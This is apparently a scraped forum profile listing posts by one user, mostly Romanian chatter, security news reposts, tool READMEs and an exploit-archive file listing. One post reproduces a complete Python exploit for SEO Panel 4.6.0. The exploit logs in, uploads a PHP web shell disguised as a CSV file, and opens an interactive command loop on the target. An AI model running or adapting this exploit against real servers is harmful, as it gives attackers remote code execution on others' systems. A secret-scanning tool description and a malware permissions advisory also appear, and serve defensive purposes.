-
Posts
1026 -
Joined
-
Days Won
55
Everything posted by Kev
-
Salutare natiune Exista o aplicatie pentru Android cu specificatiile Main Camera Dual 13 MP, f/1.9, 28mm (wide), AF 5 MP, f/2.2, 12mm (ultrawide) Features LED flash, panorama, HDR Video 1080p@30/60fps prin care se poate observa printr-un geam opac 100% ? Danke Edit: am rezolvat exista o aplicatii free de tip-ul X-Ray Camera Free v1.0.15 (2011)
-
Ceva de gen, dar sunt PET-uri si doze de aluminium si, da nu am YT premium Proiectul privind garanţia de 50 de bani pe ambalaje, contestat de magazine - Stirileprotv.ro Ascultam musiq pe YT si am auzit un ads, eram in alta camera, nu am avut timp sa-i dau view
-
Salutare cetateni! Stiu din 2020 ca in luna in. 21 se vor implementa Automate de reciclare, in parcarile din in zonele unde sunt aplasate (kaufland, Profi, & Penny), Carrefour este la o distanta de 50km de mine Am acumulutat aproximativ 1000 doze de energizant/bere + PET-uri de Fanta Madness (cu alchool), stiu ca se plateste undeva sau un ticket de reducere. In zona in care sunt, nu exista. Am ghinionul ca nu am YT premium si am auzit ceva ads de o aplicatie, unde primesti puncte daca le returnezi, nu are rost sa strabat 50km sa platesc gaz-ul si sa mananc un Meniu Chicken McNuggets. Cunoaste cineva aplicatia? Sa traiti!
-
About GitLab Watchman GitLab Watchman is an application that uses the GitLab API to audit GitLab for sensitive data and credentials exposed internally. Features It searches GitLab for internally shared projects and looks at: Code Commits Wiki pages Issues Merge requests Milestones For the following data: GCP keys and service account files AWS keys Azure keys and service account files Google API keys Slack API tokens & webhooks Private keys (SSH, PGP, any other misc private key) Exposed tokens (Bearer tokens, access tokens, client_secret etc.) S3 config files Tokens for services such as Heroku, PayPal and more Passwords in plaintext and more Time based searching You can run GitLab Watchman to look for results going back as far as: 24 hours 7 days 30 days All time This means after one deep scan, you can schedule GitLab Watchman to run regularly and only return results from your chosen timeframe. Rules GitLab Watchman uses custom YAML rules to detect matches in GitLab. They follow this format: --- filename: enabled: #[true|false] meta: name: author: date: description: #what the search should find# severity: #rating out of 100# scope: #what to search, any combination of the below# - blobs - commits - milestones - wiki_blobs - issues - merge_requests test_cases: match_cases: - #test case that should match the regex# fail_cases: - #test case that should not match the regex# strings: - #search query to use in GitLab# pattern: #Regex pattern to filter out false positives# There are Python tests to ensure rules are formatted properly and that the Regex patterns work in the tests dir More information about rules, and how you can add your own, is in the file docs/rules.md. Logging GitLab Watchman gives the following logging options: Log file Stdout TCP stream Results are output in JSON format, perfect for ingesting into a SIEM or other log analysis platform. For file and TCP stream logging, configuration options need to be passed via .conf file or environment variable. See the file docs/logging.md for instructions on how to set it up. If no logging option is given, GitLab Watchman defaults to Stdout logging. Requirements GitLab versions GitLab Watchman uses the v4 API, and works with GitLab Enterprise Edition versions: 13.0 and above - Yes GitLab.com - Yes 12.0 - 12.10 - Maybe, untested but if using v4 of the API then it could work GitLab Licence & Elasticsearch To search the scopes: blobs wiki_blobs commits The GitLab instance must have Elasticsearch configured, and be running Enterprise Edition with a minimum GitLab Starter or Bronze Licence. GitLab personal access token To run GitLab Watchman, you will need a GitLab personal access token. You can create a personal access token in the GitLab GUI via Settings -> Access Tokens -> Add a personal access token The token needs permission for the following scopes: api Note: Personal access tokens act on behalf of the user who creates them, so I would suggest you create a token using a service account, otherwise the app will have access to your private repositories. GitLab URL You also need to provide the URL of your GitLab instance. Providing token & URL GitLab Watchman will first try to get the the GitLab token and URL from the environment variables GITLAB_WATCHMAN_TOKEN and GITLAB_WATCHMAN_URL, if this fails they will be taken from .conf file (see below). .conf file Configuration options can be passed in a file named watchman.conf which must be stored in your home directory. The file should follow the YAML format, and should look like below: gitlab_watchman: token: abc123 url: https://gitlab.example.com logging: file_logging: path: json_tcp: host: port: GitLab Watchman will look for this file at runtime, and use the configuration options from here. If you are not using the advanced logging features, leave them blank. If you are having issues with your .conf file, run it through a YAML linter. An example file is in docs/example.conf Note If you use any other Watchman applications and already have a watchman.conf file, just append the conf data for GitLab Watchman to the existing file. Installation Install via pip pip install gitlab-watchman Or via source Usage GitLab Watchman will be installed as a global command, use as follows: usage: gitlab-watchman [-h] --timeframe {d,w,m,a} --output {file,stdout,stream} [--version] [--all] [--blobs] [--commits] [--wiki-blobs] [--issues] [--merge-requests] [--milestones] [--comments] Monitoring GitLab for sensitive data shared publicly optional arguments: -h, --help show this help message and exit --version show program's version number and exit --all Find everything --blobs Search code blobs --commits Search commits --wiki-blobs Search wiki blobs --issues Search issues --merge-requests Search merge requests --milestones Search milestones --comments Search comments required arguments: --timeframe {d,w,m,a} How far back to search: d = 24 hours w = 7 days, m = 30 days, a = all time --output {file,stdout,stream} Where to send results You can run GitLab Watchman to look for everything, and output to default Stdout: gitlab-watchman --timeframe a --all Or arguments can be grouped together to search more granularly. This will look for commits and milestones for the last 30 days, and output the results to a TCP stream: gitlab-watchman --timeframe m --commits --milestones --output stream Other Watchman apps You may be interested in some of the other apps in the Watchman family: Slack Watchman GitHub Watchman License The source code for this project is released under the GNU General Public Licence. This project is not associated with GitLab. Download gitlab-watchman-master.zip or git clone https://github.com/PaperMtn/gitlab-watchman.git Source
-
Sau scam Page catre Admin off: pax mai furi prajituri din aprozare?
-
SEO Panel version 4.6.0 remote code execution exploit. Original discovery of code execution in this version is attributed to Daniel Monzon and Kiko Andreu in October of 2020. # Exploit Title: SEO Panel 4.6.0 - Remote Code Execution (2) # Date: 22 Jan 2021 # Exploit Author: Kr0ff # Vendor Homepage: https://www.seopanel.org/https://www.kentico.com/ # Software Link: https://www.seopanel.org/spdownload/4.6.0 # Version: 4.6.0 # Tested on: Ubuntu 20.04 #!/usr/bin/env python3 ''' DESCRIPTION: - SeoPanel 4.6.0 vulnerable to Remote Code Execution via authenticated file upload FIXED: - ver 4.7.0 AUTHOR: - Kr0ff ''' #https://asciiart.website/index.php?art=animals/bats try: import requests import argparse import sys from termcolor import colored from time import sleep except ImportError as e: print(colored("[ERROR]: ", "red"), f"{e}") def arty(): artz = """ HAPPY HALLOWEEN ! ....._ `. ``-. .-----.._ `, `-. .: /` : `".. ..-`` : / ...--:::`n n.`::... : `:`` .` :: / `. ``---..:. `\ .` ._: .-: :: `. .-`` : : :_\\_/: : .:: `. / : / \-../:/_.`-` \ : :: _.._ q` p ` /` \| :-` ``(_. ..-----hh``````/-._: `: `` / ` E: / : _/ : _..-`` l--`` ---------------------------------------------------------- _ ___ ___ ___ ___ __ ___ ___| |___ ___ ___ |_ -| -_| . | . ||. | | -_| | _| _| -_| |___|___|___| _|___|_|_|___|_|_| |___|___| |_| 4.6.0 @Kr0ff ---------------------------------------------------------- """ print(artz) #Initialize requests to create a session r = requests.session() #Create a login for the user def login(TARGET, USER, PASS): data = {"sec":"login", "red_referer": f"{TARGET}", "userName": f"{USER}", "password": f"{PASS}","login":""} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"} req = r.post(f"{TARGET}/login.php", headers=headers, data=data, verify=False) if req.status_code == 200: print(colored("[SUCCESS]", "green"), f"Status code for login.php -> {req.status_code}\r\n") else: print(colored("[FAILURE]", "red"), f"Status code for login.php -> {req.status_code}\r\n") print("Please check if you are providing the right path to 'seopanel' or if server is live...") get_ch = req.headers.get("Set-Cookie") return get_ch #Upload the webshell to target server def exploit(TARGET, USER, PASS): login(TARGET, USER, PASS) headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": TARGET + "/admin-panel.php", "Content-Type": "multipart/form-data; boundary=---------------------------193626971803013289998688514", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"} payload = "-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"sec\"\r\n\r\nimport\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"userid\"\r\n\r\n1\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"website_csv_file\"; filename=\"bc1ab68651691302e1434959b70cba26.php\"\r\nContent-Type: text/csv\r\n\r\n<?php system($_GET['veiocx']); ?>\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"delimiter\"\r\n\r\n,\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"enclosure\"\r\n\r\n\"\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"escape\"\r\n\r\n\\\r\n-----------------------------193626971803013289998688514--\r\n" req0 = r.post(f"{TARGET}/websites.php", headers=headers, data=payload, verify=False) if req0.status_code == 200: print(colored("[SUCCESS]", "green"), f"Status code for payload upload [websites.php] -> {req0.status_code}\r\n") else: print(colored("[FAILURE]", "red"), f"Status code for payload upload [websites.php] -> {req0.status_code}\r\n") print("Please check if you are providing the right path or if server is live...") while(1): try: p = input("$> ") shell_url = TARGET + f"tmp/bc1ab68651691302e1434959b70cba26.php?veiocx={p}" control = r.get(shell_url, headers=headers, verify=False) if control.status_code == 200: print(colored("[SUCCESS]","green"), "Shell uploaded successfully !\r\n\r\n") print(control.text) else: print(colored("[ERROR]","red"), "Shell not uploaded... :(") print("Status code ->", colored(control.status_code, "red")) sys.exit(0) except KeyboardInterrupt: #Do self-cleanup on ctrl+c and wait a sec cleanup = TARGET + f"tmp/bc1ab68651691302e1434959b70cba26.php?veiocx=rm bc1ab68651691302e1434959b70cba26.php" requests.get(cleanup, headers=headers, verify=False) sleep(1) print(colored("\r\n[ERROR]", "red"), "Exitting ! Self-cleanup done !") break #Initilize parser for arguments def parse_argz(): parser = argparse.ArgumentParser(description='SEO Panel 4.6.0 authenticated RCE via file upload') parser.add_argument("-t", "--target", help="Target http/s:[IP/HOSTNAME]/seopanel/", type=str) parser.add_argument("-u", "--user", help="Username to login as", type=str) parser.add_argument("-p", "--passwd", help="Password to authenticate with", type=str) #args = parser.parse_args(args=None if sys.argv[1:] else ['--help']) #Show help menu if no arguments provided args = parser.parse_args(args=None) if not args.target or not args.user or not args.passwd: parser.error(colored("[WARNING]","yellow"), "Not all arguments provided") sys.exit(1) else: TARGET = str(args.target) USER = str(args.user) PASS = str(args.passwd) exploit(TARGET, USER, PASS) if __name__ == "__main__": try: arty() parse_argz() except Exception as e: print(colored("[ERROR]","red"), f"-> {e}") sys.exit(1) Source
-
Nu, am incercat cu Additional CSS: ::-moz-selection { background-color: #FA0000; color: #fff; } ::selection { background-color: #FA0000; color: #fff; } Rezultat: Vreau doar ca textul sa fie <strong & red> Edit:/ imi afiseaza pe toate paginile cand selectex textul, ex: tituli: "Cookies, Service Providers" etc...
-
[wpautoterms company_name] si [wpautoterms site_name] Sa fie /Bold
-
YTT TECH - 11 arduino vids YTT Tech exists to organize, curate, and surface the wealth of instructional content on YouTube. To be a place to discover and explore new skills and tools. We've only scratched the surface thus far, there's a ton of great content that hasn't been covered yet. If you know of something missing, it's quick and easy to sign up and start submitting videos! Here is a short video demonstrating some of the features and ideas behind the project. If there's something you'd like to see, let us know! You can reach out at team@ytt-tech.com or via the form below. - James URL: https://www.ytt-tech.com/electronics/arduino Source: https://james.js.org
-
Salut, pe o pagina de Wordpress, vreau sa modific, cateva texte, culoare/font: cod: Last updated: [wpautoterms last_updated_date] [wpautoterms company_name] ("us", "we", or "our") operates the [wpautoterms site_name] website (the "Service"). In tema respectiva nu am optiunea Changing Font Styles in Block Editor Multumesc anticipat.
-
Free Bitcoin? Don’t believe it. Those of us riding the Bitcoin (BTC) wave have watched interest in the cryptocurrency rise especially as the price of a single coin has now reached over $37,000. Bitcoin, Ethereum (ETH), and now Dogecoin (DOGE) -- thanks to a few tweets by Elon Musk -- have all come onto the radar of would-be traders, but as with every investment, scam artists are seeking means to cash in. Cryptocurrency is certainly not immune to scams or other threats. Cryptocurrency exchanges hit with cyberattacks can end up losing trader funds; exit scams still occur, and regulators are constantly battling fraud. We're unlikely to see any end of crypto-related scams anytime soon, and in a new warning posted by Kaspersky, a new scheme is now targeting users of Discord. Discord is a messaging and voice chat service that caters to an estimated 300 million users, having branched out from a gamer-heavy community to general use for clubs and for friends to stay in touch. According to Kaspersky researcher Mikhail Sytnik, scam artists are now entering Discord servers and are sending private messages to users that appear to be from new, up-and-coming cryptocurrency exchanges. As new projects and ones that want to "support traders in difficult times," these 'exchanges' try to attract users with promises of free cryptocurrency. And, of course, the recipient is the lucky one chosen for free BTC or ETH. Naturally, such a scam doesn't attempt to attract users with a paltry offering; instead, thousands of dollars' worth of cryptocurrency is being awarded. Lucky you. Each message contains instructions and a code for accepting the "gift," Kasperksy notes, as well as a link to register on the fake exchange. Kaspersky As cryptocurrency wallets are now a top target for threat actors, the websites will also offer "two-factor authentication" and "phishing protection" options to try and appear legitimate. Kaspersky Victims going through the registration process are then lured to provide a substantial personal profile, including contact details, photo ID, a selfie, and a signature. While these checks are now common on legitimate cryptocurrency trading posts, this information can be packaged up and sold to other cybercriminals, or could potentially be used in identity theft. In the final step of this particular scheme, once the prize 'code' is submitted and accepted, the scammers require a small "top-up" in either BTC, ETH, or USD to process the gift. Should a victim hand over their cash, of course, it's gone for good. Fake exchanges are only one attack vector used by scam artists in the cryptocurrency sector -- Initial Coin Offerings (ICOs), too, are constantly abused. In January, a resident of San Francisco was jailed for six months after defrauding investors of cryptocurrency worth an estimated $20 million by pretending to be an ICO consultant. He has been ordered to pay $4.4 million in restitution. Via zdnet.com
-
VVV is a local developer environment, mainly aimed at WordPress developers. It uses Vagrant and VirtualBox, and can be used to build sites, and contribute to WordPress. How To Use To use it, download and install Vagrant and VirtualBox. Then, clone this repository and run: vagrant plugin install vagrant-goodhosts --local vagrant up --provision When it's done, visit http://vvv.test. The online documentation contains more detailed installation instructions. Web: https://varyingvagrantvagrants.org/ Contributing: Contributions are more than welcome. Please see our current contributing guidelines. Thanks! Minimum System requirements For system requirements, please read the system requirements documentation here Software included For a comprehensive list, please see the list of installed packages. Download VVV-develop.zip or git clone https://github.com/Varying-Vagrant-Vagrants/VVV.git Source
-
- tom j nowell
- jeremy felt
- (and 4 more)
-
Backdoor.Win32.RemoteManipulator.brr malware suffers from an insecure permissions vulnerability. Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/717f316391b6a7b97fa160b0a627a413.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.RemoteManipulator.brr Vulnerability: Insecure Permissions EoP Description: This malware creates a dir named "eaKVB87.tmp" under c:\ and grants change (C) permissions to authenticated users group. This can result in EoP as any authenticated user can modify its dir. Type: PE32 MD5: 717f316391b6a7b97fa160b0a627a413 Vuln ID: MVID-2021-0067 Dropped files: citoCavb.vbs, N0731337.bak, taskhosteo.exe, vp8encoder.dll Disclosure: 02/02/2021 Exploit/PoC: C:\>cacls C:\eaKVB87.tmp C:\eaKVB87.tmp BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C C:\>cacls C:\eaKVB87.tmp\taskhosteo.exe C:\eaKVB87.tmp\taskhosteo.exe BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C Directory of c:\eaKVB87.tmp 03/27/2017 01:38 AM 42,320 citoCavb.vbs 01/27/2021 08:36 PM 0 N0731337.bak 03/21/2017 08:11 PM 3,968,512 taskhosteo.exe 09/01/2016 07:44 AM 1,639,336 vp8encoder.dll Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). Source malvuln.com
-
DATO.RSS The best RSS Search Engine experience you can find. DATO.RSS - Search Engine: Quickly search through the millions of available RSS feeds. DATO.RSS - API: Turns feed data into an awesome API. The API simplifies how you handle RSS, Atom, or JSON feeds. You can add and keep track of your favourite feed data with a simple, fast and clean REST API. All entries are enriched by Machine Learning and Semantic engines. LIVE https://datorss.com Example curl 'https://datorss.com/api/searches?q=news' | json_pp { "data": [ { "id": "86b0f829-e300-4eef-82e1-82f34d03aff6", "type": "entry", "attributes": { "title": "\"Pandemic, Infodemic\": 2 Cartoon Characters Battling Fake News In Assam", "url": "https://www.ndtv.com/india-news/coronavirus-pandemic-infodemic-2-cartoon-characters-battling-fake-news-in-assam-2222333", "published_at": 1588448805, "body": "An English daily in Assam's Guwahati has been publishing a cartoon strip to tackle the fake news related to the coronavirus pandemic. The two central characters- \"Pandemic and Infodemic\"- are being...<img src=\"http://feeds.feedburner.com/~r/NDTV-LatestNews/~4/lEmH201Q8jI\" height=\"1\" width=\"1\" alt=\"\"/>", "text": "An English daily in Assam's Guwahati has been publishing a cartoon strip to tackle the fake news related to the coronavirus pandemic. The two central characters- \"Pandemic and Infodemic\"- are being...", "categories": [ "all india" ], "sentiment": null, "parent": { "id": "c97bdae6-b5d1-4966-b9f3-615e29d4d47d", "title": "NDTV News - Special", "url": "feed:http://feeds.feedburner.com/NDTV-LatestNews", "rank": 99 }, "tags": [] }, "relationships": { "feed": { "data": { "id": "c97bdae6-b5d1-4966-b9f3-615e29d4d47d", "type": "feed" } } } }, ] } Wiki All documentation is in the Wiki section. Feel free to make it better, of course. https://github.com/davidesantangelo/dato.rss/wiki Download dato.rss-main.zip or git clone https://github.com/davidesantangelo/dato.rss.git Source
-
Kobalos’ codebase is tiny, but its impact is not. A small but complex malware variant is targeting supercomputers worldwide. Reverse engineered by ESET and described in a blog post on Tuesday, the malware has been traced back to attacks against supercomputers used by a large Asian Internet Service Provider (ISP), a US endpoint security vendor, and a number of privately-held servers, among other targets. The cybersecurity team has named the malware Kobalos in deference to the kobalos, a small creature in Greek mythology believed to cause mischief. Kobalos is unusual for a number of reasons. The malware's codebase is tiny but is sophisticated enough to impact at least Linux, BSD, and Solaris operating systems. ESET suspects it may possibly be compatible with attacks against AIX and Microsoft Windows machines, too. While working with the CERN Computer Security Team, ESET realized the "unique, multiplatform" malware was targeting high performance computer (HPC) clusters. In some cases of infection, it appears that 'sidekick' malware hijacks SSH server connections to steal credentials that are then used to obtain access to HPC clusters and deploy Kobalos. Kobalos is, in essence, a backdoor. Once the malware has landed on a supercomputer, the code buries itself in an OpenSSH server executable and will trigger the backdoor if a call is made through a specific TCP source port. Other variants act as middlemen for traditional command-and-control (C2) server connections. Kobalos grants its operators remote access to file systems, allows them to spawn terminal sessions, and also acts as connection points to other servers infected with the malware. ESET says that a unique facet of Kobalos is its ability to turn any compromised server into a C2 through a single command. The malware was a challenge to analyze as all of its code is held in a "single function that recursively calls itself to perform subtasks," ESET says, adding that all strings are encrypted as a further barrier to reverse engineering. As of now, more research needs to be conducted in the malware -- and who may be responsible for its development. Via zdnet.com
-
- 1
-
- charlie osborne
- marc-etienne m.léveillé
-
(and 1 more)
Tagged with:
-
2017 - MU, LOL, etc... Trivia kamarazilor ca sunteti batrani (va imbunatatiti cultura generala)
-
Ha, m-am grabit, acum am observat (202012-exploits.tgz) 2012.tgz Resources: https://github.com/hackerhouse-opensource/exploits
-
This archive contains all of the 231 exploits added to Packet Storm in January, 2021. Contents 202101-exploits\202101-exploits\2101-exploits 02/02/2021 04:43 AM <DIR> . 02/02/2021 04:43 AM <DIR> .. 01/01/2021 06:24 PM 2,388,252 202012-exploits.tgz 01/03/2021 04:33 AM 807 4images1711pi-xss.txt 01/15/2021 05:31 PM 862 ams10ln-xss.txt 01/21/2021 05:15 PM 559 anchorcms0127-xsrf.txt 01/11/2021 06:35 PM 2,399 anchorcms0127md-xss.txt 01/08/2021 04:46 PM 2,929 apacheflink1110-fileread.rb.txt 01/25/2021 04:51 PM 2,263 archive_tar_arb_file_write.rb.txt 01/22/2021 05:35 PM 31,880 atlassiancwcm-inject.txt 01/21/2021 05:04 PM 1,445 avms10-sql.txt 01/06/2021 05:23 PM 957 awbs370-xsrf.txt 01/05/2021 06:07 PM 804 babycaresystem10-xss.txt 01/06/2021 06:03 PM 11,773 bits_ntlm_token_impersonation.rb.txt 01/29/2021 03:05 PM 736 bloofoxcms0521-xss.txt 01/22/2021 05:22 PM 2,742 casapaes10-bypass.txt 01/25/2021 04:34 PM 930 casapaes10-xss.txt 01/25/2021 04:33 PM 1,415 casapes10-xss.txt 01/26/2021 04:20 PM 1,739 cemeterymappingis10-sql.txt 01/12/2021 06:20 PM 2,740 cemeterymis10-sql.txt 01/11/2021 01:02 AM 2,263 cemeterymis10-xss.txt 01/18/2021 05:47 PM 6,753 Cisco-UCS-Manager-CVE-2015-6435.py.txt 01/14/2021 05:19 PM 4,051 ciscorv110w1217-dos.txt 01/05/2021 05:52 PM 881 click2magic115-xss.txt 01/05/2021 05:36 PM 1,052 cmsmadesimple2215-exec.txt 01/28/2021 03:57 PM 4,331 cmsuno162lu-exec.txt 01/08/2021 05:25 PM 3,470 cockpit234-ssrf.txt 01/08/2021 04:53 PM 1,039 cockpitcms061-exec.txt 01/25/2021 04:23 PM 3,422 collabtive31-xss.txt 01/04/2021 06:59 PM 490 crud10-xss.txt 01/05/2021 06:31 PM 6,391 cs-qp50f_tester.pl.txt 01/05/2021 06:00 PM 1,119 cszcms129-xss.txt 01/04/2021 06:22 PM 576 curfewepassmgmt10-xss.txt 01/08/2021 05:00 PM 549 curfewepassms10-xss.txt 01/20/2021 04:14 PM 1,641 cve-2021-3164.py.txt 01/18/2021 05:52 PM 6,668 cve_2020_1337_printerdemon.rb.txt 01/12/2021 06:34 PM 12,312 cve_2020_17136.rb.txt 01/26/2021 04:10 PM 864 dets10-xss.txt 01/06/2021 05:25 PM 1,670 dirsearch041-csvinject.txt 01/08/2021 05:17 PM 1,607 dnsrecon0100-csvinject.txt 01/03/2021 04:22 AM 755 easycddvdcc413-dos.txt 01/08/2021 01:02 AM 774 ecsimagingpacs6215-exec.txt 01/08/2021 05:01 PM 750 ecsimagingpacs6215-sql.txt 01/05/2021 05:58 PM 2,121 egavilanmediaurlsap10-xss.txt 01/15/2021 05:15 PM 3,494 elearningsystem10-sqlshell.txt 01/15/2021 05:09 PM 7,152 eon53-exec.txt 01/28/2021 03:52 PM 601 ephpcrud10-xss.txt 01/13/2021 04:54 PM 2,054 erlang-exec.txt 01/22/2021 05:30 PM 11,426 erpnext12140-sql.txt 01/08/2021 04:40 PM 1,914 ers10-shell.txt 01/11/2021 06:38 PM 6,581 ES2021-01.txt 01/06/2021 05:42 PM 1,060 expensetracker10-xss.txt 01/11/2021 06:27 PM 1,075 eyesofnetwork53-execescalate.txt 01/11/2021 06:02 PM 3,297 eyesofnetwork53-lfi.txt 01/13/2021 05:10 PM 32,357 fiberhomehg6245d-discloseescalate.txt 01/05/2021 06:02 PM 1,487 fluentdtdagent401-insecure.txt 01/12/2021 06:21 PM 651 gilacms200-exec.txt 01/07/2021 06:35 PM 6,620 gitea175-exec.txt 01/11/2021 06:06 PM 2,414 glsa-202101-03.txt 01/04/2021 05:50 PM 5,551 gotenberg620-traversalexec.txt 01/05/2021 06:34 PM 14,376 GS20210105163358.txt 01/07/2021 06:37 PM 5,125 h2database14119-exec.txt 01/29/2021 02:56 PM 3,174 hacs1100-traversal.txt 01/05/2021 05:43 PM 1,038 hrpl10-xss.txt 01/03/2021 09:32 PM 549 hylandsearch1122-xss.txt 01/08/2021 04:37 PM 1,100 iballbaton-disclose.txt 01/05/2021 05:41 PM 619 incomcms20-upload.txt 01/05/2021 05:50 PM 1,477 intelmsem8001039-unquotedpath.txt 01/18/2021 05:45 PM 6,067 intenoiopsys3164-bypass.txt 01/06/2021 05:38 PM 2,144 iobit10pro-unquotedpath.txt 01/06/2021 05:39 PM 728 ipeakcms35-sql.txt 01/28/2021 04:04 PM 1,216 jqueryui1121-dos.txt 01/06/2021 06:08 PM 3,374 KIS-2021-01.txt 01/05/2021 06:12 PM 3,248 klogserver241-exec.txt 01/26/2021 04:17 PM 3,878 klogserver241-inject.rb.txt 01/04/2021 06:24 PM 1,618 knockpy411-csvinject.txt 01/14/2021 05:18 PM 4,071 laravel842-exec.txt 01/25/2021 04:40 PM 631 librarysystem10-sql.txt 01/18/2021 05:36 PM 766 lims10-shell.txt 01/18/2021 05:35 PM 635 lims10-sql.txt 01/08/2021 04:52 PM 484 lims10-xss.txt 01/04/2021 06:14 PM 3,577 mantisbg2243-sql.txt 01/28/2021 04:16 PM 6,731 microfocus_ucmdb_unauth_deser.rb.txt 01/03/2021 01:02 AM 1,114 minitoolshadowmaker32-unquotedpath.txt 01/25/2021 04:53 PM 4,478 mobileiron_mdm_hessian_rce.rb.txt 01/29/2021 03:12 PM 1,767 msfw6011-exec.txt 01/04/2021 06:08 PM 1,700 MVID-2021-0001.txt 01/04/2021 06:27 PM 2,092 MVID-2021-0002.txt 01/04/2021 06:35 PM 2,745 MVID-2021-0003.txt 01/04/2021 06:31 PM 2,640 MVID-2021-0004.txt 01/04/2021 06:37 PM 2,125 MVID-2021-0005.txt 01/04/2021 06:39 PM 3,352 MVID-2021-0006.txt 01/04/2021 07:16 PM 1,762 MVID-2021-0007.txt 01/04/2021 07:02 PM 3,301 MVID-2021-0008.txt 01/04/2021 07:01 PM 3,812 MVID-2021-0009.txt 01/04/2021 06:17 PM 2,559 MVID-2021-0010.txt 01/04/2021 06:20 PM 2,837 MVID-2021-0011.txt 01/04/2021 07:21 PM 3,292 MVID-2021-0012.txt 01/04/2021 06:12 PM 3,193 MVID-2021-0013.txt 01/04/2021 06:29 PM 3,402 MVID-2021-0014.txt 01/05/2021 05:30 PM 4,952 MVID-2021-0015.txt 01/08/2021 05:23 PM 1,810 MVID-2021-0016.txt 01/08/2021 05:26 PM 1,738 MVID-2021-0017.txt 01/08/2021 05:30 PM 7,130 MVID-2021-0018.txt 01/10/2021 01:11 AM 7,647 MVID-2021-0019.txt 01/11/2021 06:01 PM 3,822 MVID-2021-0020.txt 01/11/2021 06:21 PM 5,514 MVID-2021-0021.txt 01/12/2021 06:14 PM 4,463 MVID-2021-0022.txt 01/14/2021 05:15 PM 18,282 MVID-2021-0024.txt 01/14/2021 05:21 PM 51,075 MVID-2021-0025.txt 01/15/2021 05:10 PM 6,369 MVID-2021-0026.txt 01/17/2021 12:32 PM 5,670 MVID-2021-0027.txt 01/18/2021 04:59 PM 5,517 MVID-2021-0028.txt 01/18/2021 05:01 PM 5,733 MVID-2021-0029.txt 01/18/2021 05:38 PM 39,507 MVID-2021-0030.txt 01/18/2021 05:39 PM 2,701 MVID-2021-0031.txt 01/19/2021 04:47 PM 2,084 MVID-2021-0032.txt 01/19/2021 04:48 PM 1,754 MVID-2021-0033.txt 01/19/2021 04:49 PM 1,767 MVID-2021-0034.txt 01/19/2021 04:50 PM 4,940 MVID-2021-0035.txt 01/19/2021 04:49 PM 35,486 MVID-2021-0036.txt 01/20/2021 04:16 PM 17,878 MVID-2021-0037.txt 01/20/2021 04:17 PM 6,753 MVID-2021-0038.txt 01/20/2021 04:19 PM 17,310 MVID-2021-0039.txt 01/21/2021 05:08 PM 7,601 MVID-2021-0040.txt 01/21/2021 01:02 AM 1,853 MVID-2021-0041.txt 01/21/2021 01:55 AM 1,759 MVID-2021-0042.txt 01/21/2021 05:12 PM 1,900 MVID-2021-0043.txt 01/21/2021 05:16 PM 6,724 MVID-2021-0044.txt 01/22/2021 05:29 PM 6,240 MVID-2021-0045.txt 01/25/2021 04:27 PM 2,109 MVID-2021-0046.txt 01/25/2021 04:36 PM 1,850 MVID-2021-0047.txt 01/25/2021 04:39 PM 1,805 MVID-2021-0048.txt 01/25/2021 04:28 PM 1,788 MVID-2021-0049.txt 01/25/2021 04:41 PM 3,276 MVID-2021-0050.txt 01/25/2021 04:43 PM 2,409 MVID-2021-0051.txt 01/25/2021 07:28 PM 3,611 MVID-2021-0052.txt 01/26/2021 04:12 PM 8,267 MVID-2021-0053.txt 01/27/2021 04:13 PM 3,479 MVID-2021-0054.txt 01/27/2021 04:14 PM 2,493 MVID-2021-0055.txt 01/27/2021 04:15 PM 1,684 MVID-2021-0056.txt 01/29/2021 02:54 PM 1,859 MVID-2021-0057.txt 01/29/2021 02:55 PM 1,882 MVID-2021-0058.txt 01/29/2021 02:58 PM 1,684 MVID-2021-0059.txt 01/29/2021 03:08 PM 1,954 MVID-2021-0060.txt 01/29/2021 03:09 PM 2,242 MVID-2021-0061.txt 01/13/2021 05:01 PM 6,694 MVID-2021-2023.txt 01/29/2021 02:51 PM 635 mybbhtc10-disclose.txt 01/23/2021 10:32 PM 1,146 mybbtimeline10-xssxsrf.txt 01/21/2021 05:11 PM 3,665 nagiosxi575-xss.txt 01/14/2021 04:55 PM 2,985 nagiosxi57x-exec.txt 01/06/2021 05:59 PM 1,049 ncmsegov120-insecure.txt 01/15/2021 05:34 PM 7,951 netsiaseba0161-bypass.rb.txt 01/28/2021 04:09 PM 977 NS-21-001.txt 01/20/2021 04:18 PM 